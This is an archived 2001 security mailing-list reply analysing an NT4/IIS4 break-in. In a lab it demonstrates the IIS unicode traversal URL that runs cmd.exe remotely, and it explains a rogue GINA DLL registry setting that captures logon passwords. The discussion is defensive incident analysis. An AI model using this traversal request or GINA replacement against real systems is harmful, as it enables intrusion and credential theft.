Security Incidents mailing list archives
Re: Some details in a recent NT hack we encountered
From: Matt Scarborough <vexversa () USA NET>
Date: Sun, 25 Feb 2001 15:18:08 EST
On Wed, 28 Feb 2001 21:48:23 +0000, Gossi The Dog <gossi () OWNED LAB6 COM> wrote:
First off, the IIS unicode exploit does not give you SYSTEM or Administrator privs. So how are they getting those (they'll need them to make those dirs and set permissions etc).
Using David LeBlanc's DumpTokenInfo, to "dumps the information from a process token," view the output below. Any misinterpretation of Mr. LeBlanc's code is my fault, not his. Understanding Process Tokens http://www.windowsitsecurity.com/Articles/Index.cfm?ArticleID=15989 When I say default below, I mean you grab the floppies and install NT4 and grab the Option Pack and install IIS4. Sadly, this happens too often. And then this default box gets plugged into the Internet. Default IIS4 is on default NT4 at 192.168.1.65. C:\INETPUB\SCRIPTS\TEST.CMD is CMD /C "DumpTokenInfo.exe >dump.txt" we do from some other box http://192.168.1.65/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+test and then view the contents of C:\INETPUB\SCRIPTS\DUMP.TXT Token Owner: ANTARCTICA\IUSR_ANTARCTICA - User Token Primary Group: ANTARCTICA\None - Group Token Default DACL: Access Allowed for: ANTARCTICA\IUSR_ANTARCTICA - User All access Access Allowed for: NT AUTHORITY\SYSTEM - Well-known group All access Token Source: IIS Token type: Primary Token Token is not an impersonation token
Secondly, what program is generating those WinLogon logs? Not seen that before at all, very interesting.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "GinaDLL" Type: REG_SZ Data: newgina.dll NewGina.DLL replaces MSGina.DLL with a hacked (to say the least) version. As such, activities like the SAS (CTRL+ALT+DEL) are passed by WinLogon as WlxLoggedOnSAS to the rogue NewGina.DLL. Username and passwords for local logons could be saved to a file or E-mailed to an attacker across the globe.
erm, eek.
Exactly. Matt 2001-02-25 ____________________________________________________________________ Get free email and a permanent address at http://www.amexmail.com/?A=1
Current thread:
- Some details in a recent NT hack we encountered Ron Grove (Feb 24)
- Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 24)
- <Possible follow-ups>
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 25)
- Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 26)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 25)
- Re: Some details in a recent NT hack we encountered Ron Grove (Feb 25)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 26)
- Re: Some details in a recent NT hack we encountered Matt Scarborough (Feb 27)
- Re: Some details in a recent NT hack we encountered Gossi The Dog (Feb 28)